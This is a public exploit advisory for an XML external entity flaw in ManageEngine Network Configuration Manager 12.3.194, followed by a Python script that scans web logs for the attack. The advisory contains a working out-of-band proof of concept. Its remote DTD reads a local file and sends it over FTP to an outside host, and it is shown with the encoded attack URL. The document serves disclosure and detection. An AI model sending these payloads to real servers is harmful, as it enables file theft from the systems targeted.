An XML External Entity injection (XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter of a /devices/ProcessRequest.do GET request.
My VPS's evil.xml:
<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;
I used the FTP protocol to read the file; it can read the file c:\test.txt.
The test.txt file is just for testing.
Then I used the PoC to request my VPS's evil.xml:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>
The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the URL-encoded PoC.
Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing from DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the URL-encoded PoC:
http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E
On my VPS, I used a Python script to serve the FTP protocol and receive the data.

When I sent the request, I received the content of test.txt on my VPS.
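Spotting this request in web-server logs, as an added example that is not part of the report: the script decodes the RequestXML parameter of each access-log line (sample lines constructed here, the first carrying the URL-encoded PoC above) and flags a DOCTYPE, an external entity and the parameter-entity construct the PoC depends on. The log format, the decoding depth and the check names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the advisory). Line 1 carries the
# URL-encoded PoC request quoted in the report; lines 2 and 3 are benign traffic.
SAMPLE_LOG = """\
127.0.0.1 - - [19/Sep/2018:10:00:01 +0000] "GET /devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E HTTP/1.1" 200 512
127.0.0.1 - - [19/Sep/2018:10:00:02 +0000] "GET /devices/ProcessRequest.do?RequestID=464&RequestXML=%3Croot%3E%3Cdevice%20id%3D%221%22%2F%3E%3C%2Froot%3E HTTP/1.1" 200 128
127.0.0.1 - - [19/Sep/2018:10:00:03 +0000] "GET /devices/list.do HTTP/1.1" 200 4096
"""

# Request line inside a common/combined log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers of an XXE attempt in the decoded parameter: a DTD in request data is
# suspicious by itself, SYSTEM/PUBLIC marks an external entity, and "<!ENTITY %"
# is the parameter entity the PoC relies on to pull in the remote DTD.
CHECKS = (
    ("doctype", re.compile(r"<!DOCTYPE", re.I)),
    ("external-entity", re.compile(r"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded payload is also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request_xml(target):
    """Return the names of the CHECKS that the RequestXML parameter triggers."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    reasons = []
    for raw in params.get("RequestXML", []):  # parse_qs already decoded once
        xml = fully_decode(raw)
        reasons += [name for name, pat in CHECKS if pat.search(xml) and name not in reasons]
    return reasons

def scan_log(text):
    """Return [(line_number, reasons)] for log lines whose RequestXML looks like XXE."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = inspect_request_xml(match.group("target"))
            if reasons:
                findings.append((number, reasons))
    return findings
```

The lasting fix is on the server side: the XML parser handling RequestXML should have DTD processing and external entity resolution disabled, so the log check is an alerting aid, not a substitute.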